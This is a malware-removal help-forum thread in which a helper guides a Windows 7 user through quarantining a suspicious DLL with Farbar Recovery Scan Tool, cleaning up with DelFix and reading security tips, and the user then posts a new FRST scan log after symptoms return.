NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
After we run this last script we're ready to remove tools and quarantine folders. Just want to see this fix above before we start.
ascot1340
2014-11-02, 00:07
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 01-11-2014
Ran by Ryan at 2014-11-01 18:01:58 Run:2
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll
End
*****************
Processes closed successfully.
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll => Moved successfully.
The system needed a reboot.
==== End of Fixlog ====
Download Delfix from here (http://general-changelog-team.fr/fr/downloads/finish/20-outils-de-xplode/9-delfix)
Ensure Remove disinfection tools is ticked
Also tick:
Create registry backup
Click Run
Purge system restore
Any other tools and files found can simply be deleted or uninstalled via Add/Remove Programs in the Control Panel etc.
~~~~~~~~~~~~~~~~~~~~~~~
You're good to go, good job!
Please take the time to read over a few of my preventive tips.
Please navigate to Microsoft Windows Updates (http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us) and download all the "Critical Updates" for Windows.
Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP
The following programmes come highly recommended in the security community.
AdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
CryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (e.g. CryptoPrevent), preventing your files from being encrypted.
Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
Malwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time alongside your Anti-Virus to prevent malware execution.
NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
Secunia PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
Web of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.
ascot1340
2014-11-02, 05:34
Awesome! The DelFix log is posted below. Thanks so much for all of your help!
# DelFix v10.8 - Logfile created 01/11/2014 at 23:30:35
# Updated 29/07/2014 by Xplode
# Username : Ryan - RYAN-PC
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
~ Removing disinfection tools ...
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Ryan\Desktop\FRST-OlderVersion
Deleted : C:\Users\Ryan\Desktop\Addition.txt
Deleted : C:\Users\Ryan\Desktop\AdwCleaner.exe
Deleted : C:\Users\Ryan\Desktop\aswMBR.exe
Deleted : C:\Users\Ryan\Desktop\aswMBR.txt
Deleted : C:\Users\Ryan\Desktop\Fixlog.txt
Deleted : C:\Users\Ryan\Desktop\FRST.txt
Deleted : C:\Users\Ryan\Desktop\FRST64.exe
Deleted : C:\Users\Ryan\Desktop\JRT.exe
Deleted : C:\Users\Ryan\Desktop\JRT.txt
Deleted : C:\Users\Ryan\Desktop\MBR.dat
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASWMBR
~ Creating registry backup ... OK
~ Cleaning system restore ...
Deleted : RP #471 [Scheduled Checkpoint | 11/01/2014 04:31:23]
New restore point created !
########## - EOF - ##########
Glad we could help. :)
ascot1340
2014-11-03, 05:14
Oh no! It's back! Right now, three dllhost.exe *32 processes running in the task manager.
ascot1340
2014-11-03, 05:59
Now 10 dllhost.exe *32 processes running in task manager. I noticed it was back when the little blue spinning circle kept appearing next to the mouse cursor arrow. I ran the FRST and aswMBR tools again and have posted the logs below.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 02-11-2014 22:23:17
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [Google Update] => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-10-27] (Google Inc.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x76D36B0F2FC9CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-02 22:23 - 2014-11-02 22:23 - 00013813 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-11-02 22:18 - 2014-11-02 22:23 - 00000000 ____D () C:\FRST
2014-11-02 22:17 - 2014-11-02 22:18 - 02114560 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-11-02 21:34 - 2014-11-02 21:34 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-01 22:30 - 2014-11-01 22:31 - 00001058 _____ () C:\DelFix.txt
2014-10-31 20:42 - 2014-10-31 20:42 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-10-30 20:53 - 2014-11-01 22:30 - 00000000 ____D () C:\Windows\ERUNT
2014-10-30 00:30 - 2014-10-30 00:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 00:28 - 2014-10-30 00:28 - 00000000 ____D () C:\RegBackup
2014-10-30 00:27 - 2014-10-30 00:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 00:27 - 2014-10-30 00:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 18:45 - 2014-10-29 18:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 15:38 - 2014-10-15 15:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 15:38 - 2014-10-15 15:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 15:38 - 2014-10-15 15:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 19:39 - 2014-10-20 21:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 15:21 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 15:21 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 15:21 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 15:21 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 15:21 - 2014-07-06 20:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 15:21 - 2014-07-06 20:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 15:21 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 15:21 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 15:21 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 15:20 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 15:20 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 15:20 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 15:20 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 15:20 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 15:20 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 15:20 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 15:20 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 15:20 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 15:20 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 15:20 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 15:20 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 15:20 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 15:20 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 15:20 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 15:20 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 15:20 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 15:20 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 15:20 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 15:20 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 15:20 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 15:20 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 15:20 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 15:20 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 15:20 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 15:20 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 15:20 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
